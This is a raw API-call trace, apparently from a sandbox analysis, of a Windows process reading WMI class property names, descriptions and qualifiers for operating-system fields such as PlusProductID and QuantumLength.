	[0111.321] IWbemClassObject:Get (in: This=0x2ad2069cc50, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0640*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633150, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.321] SafeArrayGetLBound (in: psa=0x2ad206b0640, nDim=0x1, plLbound=0xd7edd8f164 | out: plLbound=0xd7edd8f164) returned 0x0
	[0111.321] SafeArrayGetUBound (in: psa=0x2ad206b0640, nDim=0x1, plUbound=0xd7edd8f168 | out: plUbound=0xd7edd8f168) returned 0x0
	[0111.321] SafeArrayGetElement (in: psa=0x2ad206b0640, rgIndices=0xd7edd8f140, pv=0xd7edd8f138 | out: pv=0xd7edd8f138) returned 0x0
	[0111.321] IWbemClassObject:Get (in: This=0x2ad206a6830, wszName="Name", lFlags=0, pVal=0xd7edd8f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.321] IWbemClassObject:Get (in: This=0x2ad206a6830, wszName="QualifierValue", lFlags=0, pVal=0xd7edd8f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1b8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b07c0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633160, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.321] SafeArrayGetLBound (in: psa=0x2ad206b07c0, nDim=0x1, plLbound=0xd7edd8f15c | out: plLbound=0xd7edd8f15c) returned 0x0
	[0111.321] SafeArrayGetUBound (in: psa=0x2ad206b07c0, nDim=0x1, plUbound=0xd7edd8f158 | out: plUbound=0xd7edd8f158) returned 0x0
	[0111.321] lstrlenW (lpString="CIMTYPE") returned 7
	[0111.321] lstrlenW (lpString="MaxLen") returned 6
	[0111.321] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.321] lstrlenW (lpString="read") returned 4
	[0111.322] lstrlenW (lpString="MaxLen") returned 6
	[0111.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1
	[0111.322] lstrlenW (lpString="write") returned 5
	[0111.322] lstrlenW (lpString="MaxLen") returned 6
	[0111.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.322] lstrlenW (lpString="In") returned 2
	[0111.322] lstrlenW (lpString="MaxLen") returned 6
	[0111.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.322] lstrlenW (lpString="Out") returned 3
	[0111.322] lstrlenW (lpString="MaxLen") returned 6
	[0111.322] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1
	[0111.322] SafeArrayGetElement (in: psa=0x2ad206b07c0, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.322] IUnknown:Release (This=0x2ad206a6830) returned 0x1
	[0111.322] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.323] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.323] SysStringLen (param_1="Description") returned 0xb
	[0111.323] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.323] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.323] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.323] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.323] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.323] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.323] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.323] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.323] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.323] SysStringLen (param_1="OSType") returned 0x6
	[0111.323] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.323] SysStringLen (param_1="Organization") returned 0xc
	[0111.323] SysStringLen (param_1="Organization") returned 0xc
	[0111.323] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.323] IUnknown:Release (This=0x2ad2069cc50) returned 0x1
	[0111.323] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.324] IWbemClassObject:Get (in: This=0x2ad2069b170, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae038, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.324] IWbemClassObject:Get (in: This=0x2ad2069b170, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206adef8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.324] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.324] IWbemClassObject:Get (in: This=0x2ad2069b170, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The PlusProductID property contains the product identification number for the Windows Plus! operating system enhancement software (if installed).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.325] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.325] lstrlenA (lpString="") returned 0
	[0111.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0c0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.325] SysStringLen (param_1="The PlusProductID property contains the product identification number for the Windows Plus! operating system enhancement software (if installed).") returned 0x91
	[0111.325] SysStringLen (param_1="") returned 0x0
	[0111.326] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.326] IWbemClassObject:Get (in: This=0x2ad2069b170, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.326] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.326] SysStringLen (param_1="Description") returned 0xb
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.326] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.326] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.326] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.326] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.326] SysStringLen (param_1="OSType") returned 0x6
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.326] SysStringLen (param_1="Organization") returned 0xc
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.326] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.326] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.326] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.327] IUnknown:Release (This=0x2ad2069b170) returned 0x1
	[0111.327] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.327] IWbemClassObject:Get (in: This=0x2ad2069b420, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064abf8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.327] IWbemClassObject:Get (in: This=0x2ad2069b420, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad205e6518, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.328] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.328] IWbemClassObject:Get (in: This=0x2ad2069b420, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The PlusVersionNumber property contains the version number of the Windows Plus! operating system enhancement software (if installed).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.328] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.328] lstrlenA (lpString="") returned 0
	[0111.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0c0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.329] SysStringLen (param_1="The PlusVersionNumber property contains the version number of the Windows Plus! operating system enhancement software (if installed).") returned 0x85
	[0111.329] SysStringLen (param_1="") returned 0x0
	[0111.329] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.329] IWbemClassObject:Get (in: This=0x2ad2069b420, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.330] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] SysStringLen (param_1="Description") returned 0xb
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] SysStringLen (param_1="OSLanguage") returned 0xa
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] SysStringLen (param_1="OSType") returned 0x6
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.330] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.330] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.330] IUnknown:Release (This=0x2ad2069b420) returned 0x1
	[0111.331] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.331] IWbemClassObject:Get (in: This=0x2ad2069d1b0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad205e6518, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.331] IWbemClassObject:Get (in: This=0x2ad2069d1b0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0778, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.331] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.331] IWbemClassObject:Get (in: This=0x2ad2069d1b0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Primary property determines whether this is the primary operating system./nValues: TRUE or FALSE. A value of TRUE indicates this is the primary operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.332] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.333] lstrlenA (lpString="") returned 0
	[0111.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c150, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.334] SysStringLen (param_1="The Primary property determines whether this is the primary operating system./nValues: TRUE or FALSE. A value of TRUE indicates this is the primary operating system.") returned 0xa5
	[0111.334] SysStringLen (param_1="") returned 0x0
	[0111.334] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.334] IWbemClassObject:Get (in: This=0x2ad2069d1b0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.334] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.334] SysStringLen (param_1="Primary") returned 0x7
	[0111.334] SysStringLen (param_1="Description") returned 0xb
	[0111.334] SysStringLen (param_1="Primary") returned 0x7
	[0111.334] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.334] SysStringLen (param_1="Primary") returned 0x7
	[0111.334] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.335] SysStringLen (param_1="Primary") returned 0x7
	[0111.335] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.335] SysStringLen (param_1="Primary") returned 0x7
	[0111.335] SysStringLen (param_1="OSType") returned 0x6
	[0111.335] SysStringLen (param_1="Primary") returned 0x7
	[0111.335] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.335] SysStringLen (param_1="Primary") returned 0x7
	[0111.335] SysStringLen (param_1="PlusProductID") returned 0xd
	[0111.335] SysStringLen (param_1="Primary") returned 0x7
	[0111.335] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.335] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.335] SysStringLen (param_1="Primary") returned 0x7
	[0111.335] IUnknown:Release (This=0x2ad2069d1b0) returned 0x1
	[0111.335] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.335] IWbemClassObject:Get (in: This=0x2ad2069df20, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b2a38, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.336] IWbemClassObject:Get (in: This=0x2ad2069df20, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b2948, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.336] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.336] IWbemClassObject:Get (in: This=0x2ad2069df20, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The QuantumLength property defines the number of clock ticks per quantum. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to other applications. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.336] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.336] lstrlenA (lpString="") returned 0
	[0111.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c230, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.337] SysStringLen (param_1="The QuantumLength property defines the number of clock ticks per quantum. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to other applications. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.") returned 0x1c6
	[0111.337] SysStringLen (param_1="") returned 0x0
	[0111.337] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.337] IWbemClassObject:Get (in: This=0x2ad2069df20, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b1340*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633010, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.337] SafeArrayGetLBound (in: psa=0x2ad206b1340, nDim=0x1, plLbound=0xd7edd8f164 | out: plLbound=0xd7edd8f164) returned 0x0
	[0111.337] SafeArrayGetUBound (in: psa=0x2ad206b1340, nDim=0x1, plUbound=0xd7edd8f168 | out: plUbound=0xd7edd8f168) returned 0x0
	[0111.337] SafeArrayGetElement (in: psa=0x2ad206b1340, rgIndices=0xd7edd8f140, pv=0xd7edd8f138 | out: pv=0xd7edd8f138) returned 0x0
	[0111.338] IWbemClassObject:Get (in: This=0x2ad206a5ac0, wszName="Name", lFlags=0, pVal=0xd7edd8f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.338] IWbemClassObject:Get (in: This=0x2ad206a5ac0, wszName="QualifierValue", lFlags=0, pVal=0xd7edd8f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1b8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0a40*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633680, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.338] SafeArrayGetLBound (in: psa=0x2ad206b0a40, nDim=0x1, plLbound=0xd7edd8f15c | out: plLbound=0xd7edd8f15c) returned 0x0
	[0111.338] SafeArrayGetUBound (in: psa=0x2ad206b0a40, nDim=0x1, plUbound=0xd7edd8f158 | out: plUbound=0xd7edd8f158) returned 0x0
	[0111.338] lstrlenW (lpString="CIMTYPE") returned 7
	[0111.338] lstrlenW (lpString="Values") returned 6
	[0111.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.338] lstrlenW (lpString="read") returned 4
	[0111.338] lstrlenW (lpString="Values") returned 6
	[0111.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0111.338] lstrlenW (lpString="write") returned 5
	[0111.338] lstrlenW (lpString="Values") returned 6
	[0111.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.338] lstrlenW (lpString="In") returned 2
	[0111.338] lstrlenW (lpString="Values") returned 6
	[0111.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.338] lstrlenW (lpString="Out") returned 3
	[0111.338] lstrlenW (lpString="Values") returned 6
	[0111.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0111.338] SafeArrayGetElement (in: psa=0x2ad206b0a40, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.339] SafeArrayGetElement (in: psa=0x2ad206b0a40, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.339] SafeArrayGetElement (in: psa=0x2ad206b0a40, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.340] IUnknown:Release (This=0x2ad206a5ac0) returned 0x1
	[0111.340] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.340] SysStringLen (param_1="Description") returned 0xb
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.340] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.340] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.340] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.340] SysStringLen (param_1="OSType") returned 0x6
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.340] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.340] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.340] SysStringLen (param_1="Primary") returned 0x7
	[0111.340] SysStringLen (param_1="Primary") returned 0x7
	[0111.340] SysStringLen (param_1="QuantumLength") returned 0xd
	[0111.341] IUnknown:Release (This=0x2ad2069df20) returned 0x1
	[0111.341] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.341] IWbemClassObject:Get (in: This=0x2ad2069e730, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0778, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.341] IWbemClassObject:Get (in: This=0x2ad2069e730, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0e78, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.341] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.342] IWbemClassObject:Get (in: This=0x2ad2069e730, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The QuantumType property specifies either fixed or variable length quantums. Windows NT 4.0 Workstation/Windows 2000 defaults to variable length quantums where the foreground application has a longer quantum than the background applications. Windows NT Server defaults to fixed-length quantums. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to another application. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.343] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.343] lstrlenA (lpString="") returned 0
	[0111.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c220, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.344] SysStringLen (param_1="The QuantumType property specifies either fixed or variable length quantums. Windows NT 4.0 Workstation/Windows 2000 defaults to variable length quantums where the foreground application has a longer quantum than the background applications. Windows NT Server defaults to fixed-length quantums. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to another application. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.") returned 0x2a4
	[0111.344] SysStringLen (param_1="") returned 0x0
	[0111.344] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
